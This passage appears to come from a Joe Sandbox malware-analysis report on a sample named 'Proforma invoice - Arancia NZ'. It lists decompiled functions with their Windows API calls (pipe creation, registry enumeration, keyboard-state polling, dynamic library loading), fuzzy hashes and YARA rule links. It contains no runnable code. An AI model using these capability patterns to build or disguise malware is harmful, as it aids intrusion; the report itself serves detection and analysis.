                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 002D6468
                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002D647D
                                                                                                                    • DestroyWindow.USER32(?), ref: 002D6485
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                    • String ID: SysAnimate32
                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                    • Opcode ID: 0ceeef769ffced74df1cfc14ca759395e10eef0a76036c29ed49f2e5a3c8f2c3
                                                                                                                    • Instruction ID: 47555ba1cf7e170563cdc386745c89d240dbcf5946916d4999ef2c564af3257a
                                                                                                                    • Opcode Fuzzy Hash: 0ceeef769ffced74df1cfc14ca759395e10eef0a76036c29ed49f2e5a3c8f2c3
                                                                                                                    • Instruction Fuzzy Hash: 4F218E71120206AFEF204F64DC48EBB37ADEB58764F10862AF95092290D771DC619B60
                                                                                                                    Function 002B6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 002B6DBC
                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002B6DEF
                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 002B6E01
                                                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002B6E3B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                    • Opcode ID: a90a621793c085cf78d2a6b5222af4d0f33fa7b59c0e2c5d1b4390a3c35fd70c
                                                                                                                    • Instruction ID: bd1ca146b994a6d57a86179c6483cf6056172b9d5f4e8e2014ef60f460b50b40
                                                                                                                    • Opcode Fuzzy Hash: a90a621793c085cf78d2a6b5222af4d0f33fa7b59c0e2c5d1b4390a3c35fd70c
                                                                                                                    • Instruction Fuzzy Hash: AE21817561020BABDB209F29DC0CADA7BA4EF45760F204A2AFCA1D72D0D7749D608B54
                                                                                                                    Function 002B6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 002B6E89
                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002B6EBB
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 002B6ECC
                                                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002B6F06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                    • Opcode ID: 4079d17c9db9d8457e38be6e403ba3b64e31fedaef6c312a7e137df1e9e829a2
                                                                                                                    • Instruction ID: 3f62396de48fedf8088d5c5bae17191615b77370f765c72878aefd1df5423eae
                                                                                                                    • Opcode Fuzzy Hash: 4079d17c9db9d8457e38be6e403ba3b64e31fedaef6c312a7e137df1e9e829a2
                                                                                                                    • Instruction Fuzzy Hash: DD2190799103069BDB209F69DC0CEEA77A8EF457A0F200A1AFDA1D72D0D774E8608B54
                                                                                                                    Function 002BAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 002BAC54
                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002BACA8
                                                                                                                    • __swprintf.LIBCMT ref: 002BACC1
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,002DF910), ref: 002BACFF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                    • String ID: %lu
                                                                                                                    • API String ID: 3164766367-685833217
                                                                                                                    • Opcode ID: 2fc4abc03e13f51017a51fdb21edda7218ebc9c90646dab0d42e9102c4af1670
                                                                                                                    • Instruction ID: db1cf26005adb8e832fa28e46dbf0c4c95d3f6dd76aa410a2f891878d026fa15
                                                                                                                    • Opcode Fuzzy Hash: 2fc4abc03e13f51017a51fdb21edda7218ebc9c90646dab0d42e9102c4af1670
                                                                                                                    • Instruction Fuzzy Hash: FE216D70A10209AFCB10EF64DD45DEEBBB8EF49715B0040A9F909AB251DA31EE55CF61
                                                                                                                    Function 002B1142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002AFCED,?,002B0D40,?,00008000), ref: 002B115F
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,002AFCED,?,002B0D40,?,00008000), ref: 002B1184
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002AFCED,?,002B0D40,?,00008000), ref: 002B118E
                                                                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,002AFCED,?,002B0D40,?,00008000), ref: 002B11C1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                    • String ID: @+
                                                                                                                    • API String ID: 2875609808-2529809375
                                                                                                                    • Opcode ID: f80f05852c65f0eb7745716b9f708dec13035ce7f9fd0bc4ddd509fe9cc9393a
                                                                                                                    • Instruction ID: 8504e2ad2372c729303ed0cbe9391450e9a14e876e99d66e6d9368c410220071
                                                                                                                    • Opcode Fuzzy Hash: f80f05852c65f0eb7745716b9f708dec13035ce7f9fd0bc4ddd509fe9cc9393a
                                                                                                                    • Instruction Fuzzy Hash: A4118231C2151DE7CF00DFA8D9586EEBB78FF09751F404056DA49B6240CB709970DBA5
                                                                                                                    Function 002B1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 002B1B19
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                    • API String ID: 3964851224-769500911
                                                                                                                    • Opcode ID: a0507e44e5e09046815aa64716704f9b95ab21b41a92e91e2a93d74303c79b6e
                                                                                                                    • Instruction ID: 6c8803aa938f49dcb846d1de315c516a9df7063b6c14dbbd8389adcbf0175a6c
                                                                                                                    • Opcode Fuzzy Hash: a0507e44e5e09046815aa64716704f9b95ab21b41a92e91e2a93d74303c79b6e
                                                                                                                    • Instruction Fuzzy Hash: 28117C349212098BCF00EF54D8A28EEB3B4BF26708F508465D85467691EB325D2ACF40
                                                                                                                    Function 002CEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002CEC07
                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 002CEC37
                                                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 002CED6A
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002CEDEB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2364364464-0
                                                                                                                    • Opcode ID: 680f1eec6f4ca753498a6501858f37085e40fbf21dee764c3d7b76dcf0ecb607
                                                                                                                    • Instruction ID: 553c1e6765c1001af91ec33da1ed587827f9abe4617af3418861914004e3ed45
                                                                                                                    • Opcode Fuzzy Hash: 680f1eec6f4ca753498a6501858f37085e40fbf21dee764c3d7b76dcf0ecb607
                                                                                                                    • Instruction Fuzzy Hash: FE8191716103019FDB60EF28C846F2AB7E5AF44710F05891DF99ADB292DBB0AC54CF56
                                                                                                                    Function 0027541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1559183368-0
                                                                                                                    • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                                                    • Instruction ID: 1b673af7f11bd7ac35374ad8c73e5f637c4a9c2f140a51301c912119ef1e71f1
                                                                                                                    • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                                                    • Instruction Fuzzy Hash: FA51CA70A20B26DBDB249F65D84056EF7A6AF40321F54C729F82D962D0D7F09D748F41
                                                                                                                    Function 002D0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                      • Part of subcall function 002D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CFDAD,?,?), ref: 002D0E31
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D00FD
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D013C
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002D0183
                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 002D01AF
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002D01BC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3440857362-0
                                                                                                                    • Opcode ID: 25cfa5fa8c148a92661a7c5df06b7ed09946c43456a4e6e573e9d0e5548406e6
                                                                                                                    • Instruction ID: 5d5dfcb40fa20d96d6784237713f3b1d156f67e8d58fc48e0d33e4de07ebed40
                                                                                                                    • Opcode Fuzzy Hash: 25cfa5fa8c148a92661a7c5df06b7ed09946c43456a4e6e573e9d0e5548406e6
                                                                                                                    • Instruction Fuzzy Hash: D8515C71628204AFC704EF68D885F6AB7E8BF84304F44491EF959872A1DB31ED18CF56
                                                                                                                    Function 002CD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 002CD927
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 002CD9AA
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 002CD9C6
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 002CDA07
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 002CDA21
                                                                                                                      • Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002B7896,?,?,00000000), ref: 00255A2C
                                                                                                                      • Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002B7896,?,?,00000000,?,?), ref: 00255A50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 327935632-0
                                                                                                                    • Opcode ID: 5c48fcc2941385332d55b24576dffee668221c2fabe9e100ae71bfa976792cb6
                                                                                                                    • Instruction ID: 35e59bf6383d11906fa28a578fd7e3795dbb9726fc7cc40483d462537e510454
                                                                                                                    • Opcode Fuzzy Hash: 5c48fcc2941385332d55b24576dffee668221c2fabe9e100ae71bfa976792cb6
                                                                                                                    • Instruction Fuzzy Hash: E3512875A10206DFCB00EFA8C494EADB7F4EF09314B148169E81AAB322D730ED55CF94
                                                                                                                    Function 002BE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002BE61F
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002BE648
                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002BE687
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002BE6AC
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002BE6B4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1389676194-0
                                                                                                                    • Opcode ID: 1b332b7b6d8eef99fcb9c334a20cea59b5a3180293c7c09ce6434df362675733
                                                                                                                    • Instruction ID: b1f4cd98f40c58799a43663be9090c73c7aa8a3d55a3c1bad13794f41771a813
                                                                                                                    • Opcode Fuzzy Hash: 1b332b7b6d8eef99fcb9c334a20cea59b5a3180293c7c09ce6434df362675733
                                                                                                                    • Instruction Fuzzy Hash: 42513935A10605DFCB00EF64C9859AEBBF5EF09314B1480A9EC09AB361CB31ED64DF54
                                                                                                                    Function 002DA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ccbf70aaf1d7574b896239263e4d6b69822f8b04f1dd723286e89f0a808a6a36
                                                                                                                    • Instruction ID: dd23e410533fcda390f7f31cfba434736b8f2e1545d0f5fd6b87e1f09a960188
                                                                                                                    • Opcode Fuzzy Hash: ccbf70aaf1d7574b896239263e4d6b69822f8b04f1dd723286e89f0a808a6a36
                                                                                                                    • Instruction Fuzzy Hash: 3A41D235925105AFD720DF28DC49FA9BBA8EB09311F144267F81AA73E0C770ED61DA51
                                                                                                                    Function 00252344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 00252357
                                                                                                                    • ScreenToClient.USER32(003157B0,?), ref: 00252374
                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00252399
                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 002523A7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4210589936-0
                                                                                                                    • Opcode ID: 04ee1d1bf7dc84622f09c442455c059dbc33f460bdbbdb1953c429dd69b02bb2
                                                                                                                    • Instruction ID: bc3d9033c6099ad75aac38131ba8811eab4f901d6fbca0b56dcd2cbb075d0d3b
                                                                                                                    • Opcode Fuzzy Hash: 04ee1d1bf7dc84622f09c442455c059dbc33f460bdbbdb1953c429dd69b02bb2
                                                                                                                    • Instruction Fuzzy Hash: D7418435924106FBCF159F68C848AE9BB74FB05361F20435AF829922D0C7749D68DFA5
                                                                                                                    Function 002A63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002A63E7
                                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 002A6433
                                                                                                                    • TranslateMessage.USER32(?), ref: 002A645C
                                                                                                                    • DispatchMessageW.USER32(?), ref: 002A6466
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002A6475
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2108273632-0
                                                                                                                    • Opcode ID: 22d097c9eeb8515ccadfbe55584afc430286dbd1a3fb86a570d6a1e71caab7c7
                                                                                                                    • Instruction ID: fc42e6a88de654d5e1721c6605f8a3a97ddefe6850f33bed1ff3a267f9b38d56
                                                                                                                    • Opcode Fuzzy Hash: 22d097c9eeb8515ccadfbe55584afc430286dbd1a3fb86a570d6a1e71caab7c7
